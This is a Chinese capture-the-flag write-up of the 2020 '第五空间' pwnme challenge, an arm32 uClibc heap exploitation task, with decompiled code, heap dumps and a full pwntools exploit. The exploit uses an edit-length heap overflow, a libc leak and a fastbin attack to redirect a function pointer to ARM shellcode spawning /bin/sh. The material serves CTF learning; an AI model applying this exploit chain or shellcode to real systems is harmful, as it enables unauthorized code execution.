2020年第五空间-pwnme

June 28, 2020 CTF-Writeup 访问: 36 次

pwnme

一个arm32 pwn,而且还是堆题

我用的工具是 ghidra,arm 的题用 ida 不是太舒服。

动态调试时,用 qemu 运行这个程序会提示 libc 库错误,解决方法就是把 libc.so 文件重新软链接一下(ln -s)。

main函数分析:

/*
 * Decompiled main (Ghidra output, kept verbatim): makes stdio unbuffered,
 * allocates an 8-byte heap block holding two function pointers, calls the
 * first one, prints the menu and dispatches a single menu choice.
 */
void FUN_00010aa8(void)

{
  char acStack24 [8];   /* raw menu input from stdin */
  int local_10;         /* parsed menu choice */
  code **local_c;       /* heap-allocated pair of function pointers */

  setvbuf(stdout,(char *)0x0,2,0);   /* mode 2 == _IONBF: no buffering */
  setvbuf(stdin,(char *)0x0,2,0);
  local_c = (code **)malloc(8);       /* two 4-byte pointers (32-bit target) */
  *local_c = FUN_0001058c;            /* per the write-up, both only print a line */
  local_c[1] = FUN_000105a8;
  (**local_c)();
  meau();
  /* NOTE(review): read() does not NUL-terminate acStack24; if all 8 bytes
   * are digits, atoi() scans past the buffer into the following locals. */
  read(0,acStack24,8);
  local_10 = atoi(acStack24);
  switch(local_10) {
  case 1:
    show();
    break;
  case 2:
    add();
    break;
  case 3:
    edit();
    break;
  case 4:
    delete();
    break;
  case 5:
    /* Indirect call through the heap-resident pointer: this is the slot the
     * write-up's heap corruption retargets before choosing option 5. */
    (*local_c[1])();
                    /* WARNING: Subroutine does not return */
    exit(0);
  default:
    puts("Invalid");
  }
}

函数首先申请了8字节的堆块,里面存放了两个函数的地址(函数都是只输出一句话),然后有五个选项:

/*
 * Print the "Normal Menu" banner, the five options and the ">>> " prompt.
 * Equivalent to the decompiled menu routine: nine puts() lines followed by
 * an un-terminated printf() prompt.
 */
void meau(void)
{
  static const char *const menu_lines[] = {
    "----------------------------",
    "Normal Menu",
    "----------------------------",
    "1.Show",
    "2.Add",
    "3.Change",
    "4.Remove",
    "5.Exit",
    "----------------------------",
  };
  size_t i;

  for (i = 0; i < sizeof menu_lines / sizeof menu_lines[0]; i++)
    puts(menu_lines[i]);
  printf(">>> ");   /* no newline: the prompt stays on the input line */
}

审计后发现 edit 里允许任意长度的输入,会造成堆溢出。起初我按照 glibc 的利用手法,先构造堆块重叠,可以泄露出 libc;然后想利用 fastbin attack 来修改 hook,搜了一番发现 arm 架构下并没有 __malloc_hook/__free_hook;于是想到 main 函数开始的时候在堆中存了两个地址,改为用 fastbin attack 修改这两个地址。利用的时候,发现 fastbin 中的链表和 glibc 下的不一样:

0x22150:    0x0000001100000000  0x0000000000000022
0x22160:    0x0000001100000000  0x0000000000000a22
0x22170:    0x0000001100000000  0x0000000000022172
0x22180:    0x0000001100000000  0x0000000000000a44
0x22190:    0x0000001100000000  0x0000000000022152
0x221a0:    0x0000001100000000  0x0000000000000a66
0x221b0:    0x00000e5100000000  0x0000000000000000


0x2106c:    0x00022018  0x00000038  0x00022058  0x00000038
0x2107c:    0x00022098  0x00000038  0x000220d8  0x00000038
0x2108c:    0x00022098  0x00000038  0x00022118  0x00000000
0x2109c:    0x00000000  0x00000008  0x00022168  0x00000000
0x210ac:    0x00000000  0x00000008  0x00022188  0x00000000
0x210bc:    0x00000000  0x00000008  0x000221a8  0x00000000
0x210cc:    0x00000000  0x00000000  0x00000000  0x00000000

然后动态调试,尝试构造出能够分配到存放两个函数指针的那块内存,最后可以修改到它们;伪造的数值是根据偏移一个一个试出来的。由于没有 one_gadget,就想着在堆里写入 shellcode,再把函数指针改成堆上的地址,然后利用选项 5 来调用。

exp:

from pwn import *
context.binary = "./a.out"
context.log_level = 'debug'
# Target libc (uClibc, not glibc): symbol offsets are read from this file.
libc = ELF("./lib/libuClibc-1.0.34.so")
'''
if local:
    p = remote("106.75.126.171","33865")
elif debug:
    p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
else:
    p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
'''
# r = remote("121.36.58.215","1337")
# r = process(["qemu-arm", "-g", "1234", "-L", ".", "./a.out"])
# Run the arm32 binary under user-mode qemu with "." as the sysroot (see the
# ln -s note above about the libc lookup).
r = process(["qemu-arm", "-L", ".", "./a.out"])

# r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])


# Short I/O helpers over the tube `r` (plain defs instead of assigned lambdas).
def sl(x):
    """Send *x* followed by a newline."""
    return r.sendline(x)


def sd(x):
    """Send *x* as-is, without a trailing newline."""
    return r.send(x)


def sla(x, y):
    """Wait for *x* to be received, then send *y* plus a newline."""
    return r.sendlineafter(x, y)


def rud(x):
    """Receive up to and including *x*, returning the data without *x*."""
    return r.recvuntil(x, drop=True)


def ru(x):
    """Receive up to and including *x*."""
    return r.recvuntil(x)


def li(name, x):
    """Log *x* as a hex value labelled *name*."""
    return log.info(':'.join((name, hex(x))))


def ri():
    """Hand the tube over to the user."""
    return r.interactive()
def add(chunk_size,value):
    """Menu option 2: allocate a chunk of *chunk_size* bytes filled with *value*.

    Each prompt is answered with sendlineafter(), which is recvuntil()
    followed by sendline(), so the exchange is identical to the explicit
    ru()/sl() pairs.
    """
    sla('>>> ', '2')
    sla('Length:', str(chunk_size))
    sla('Tag:', value)
def delete(index):
    """Menu option 4: free the chunk at *index* (the program prompts with 'Tag:')."""
    sla('>>> ', '4')
    sla('Tag:', str(index))
def show():
    """Menu option 1: ask the program to print its chunk list."""
    sla('>>> ', '1')
def edit(index,len,value):
    """Menu option 3: overwrite chunk *index* with *len* bytes of *value*.

    The length is taken from us, not from the chunk, so *len* may exceed
    the chunk size - that is the overflow the write-up relies on. The
    parameter name shadows the builtin len() inside this function only.
    """
    sla('>>> ', '3')
    sla('Index:', str(index))
    sla('Length:', str(len))
    sla("Tag:", value)
def debug():
    """Attach gdb to the qemu-run target and block until Enter is pressed.

    raw_input() is Python 2 - consistent with the rest of this script, which
    concatenates str payloads with p32() output.
    """
    gdb.attach(r)
    raw_input()  # keep the exploit paused while breakpoints are placed

# --- exploit sequence: statement order matters, it reproduces one heap layout ---
# Chunk indices in the comments are the ones the author counts by hand.
add(0x38,"aaa")   # chunk 0
add(0x38,"aaa")   # chunk 1
add(0x38,"aaa")   # chunk 2
add(0x38,"aaa")   # chunk 3
# edit() accepts a length larger than the chunk (0x49 > 0x38): this is the
# overflow found in the audit. The bytes past 0x38 land in the next chunk's
# header (prev_size 0, size 0x81) - the chunk overlap the write-up describes.
edit(0,0x49,"\x11"*0x38+p32(0)+p32(0x81)+"\x22"*8)
delete(1)
add(0x38,"aaa")
show()
# After the free/realloc above, show() prints a libc pointer in entry "2 : ".
# 0x9a8ec is the author's measured offset of that pointer from the libc base.
ru("2 : ")
libc_base = u32(r.recv(4))-0x9a8ec
system = libc_base + libc.symbols['system']
li("libc_base",libc_base)
li("system",system)
li("stack",libc.symbols['environ']+libc_base)   # logged only; unused below
# Two chunks holding the raw machine code the write-up calls its shellcode
# (written into the heap because no one_gadget was available).
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
# Six 8-byte chunks: same request size as main()'s function-pointer block.
add(8,"\x11")#6
add(8,"\x22")#7
add(8,"\x33")#8
add(8,"\x44")#9
add(8,"\x55")#10
add(8,"\x66")#11
# Free three non-adjacent ones so they share a fastbin (see the dump above).
delete(6)
delete(8)
delete(10)
add(8,"\x99")
# The same overflow again, from chunk 7 into the freed neighbour: rewrites its
# size (0x11) and fd (0x22022). The author found 0x22022 by trial; the closing
# note explains why the fd is not a plain pointer (uClibc XORs it).
edit(7,0x20,"a"*8+p32(0)+p32(0x11)+p32(0x22022))
add(8,"\x99")
# add(8,p32(0x51800+libc_base)+p32(0x51800+libc_base))
# The next 8-byte allocation is the one the author steered onto main()'s
# function-pointer block. Both slots are set to 0x22098, a heap address that
# appears in the dump above. send() rather than sendline() is used here,
# presumably so no '\n' follows the second pointer.
ru('>>> ')
sl('2')
ru('Length:')
sl(str(8))
ru('Tag:')
sd(p32(0x22098)+p32(0x22098))
# shellcode = asm(shellcraft.aarch64.sh())
# edit(6,0x20,"a"*0x8+p32(0)+p32(0x11)+p32(0x22008))
# Menu option 5 calls local_c[1] (see the decompiled main), which now points
# into the heap.
ru('>>> ')
sl("5")
# show()
ri()
# NOTE(review): 0x22022 and 0x22098 are hard-coded heap addresses; they only
# hold while qemu lays the heap out identically on every run.
赛后看别人的 wp,说 arm 下 fastbin 链表的 fd 指针是异或过的。
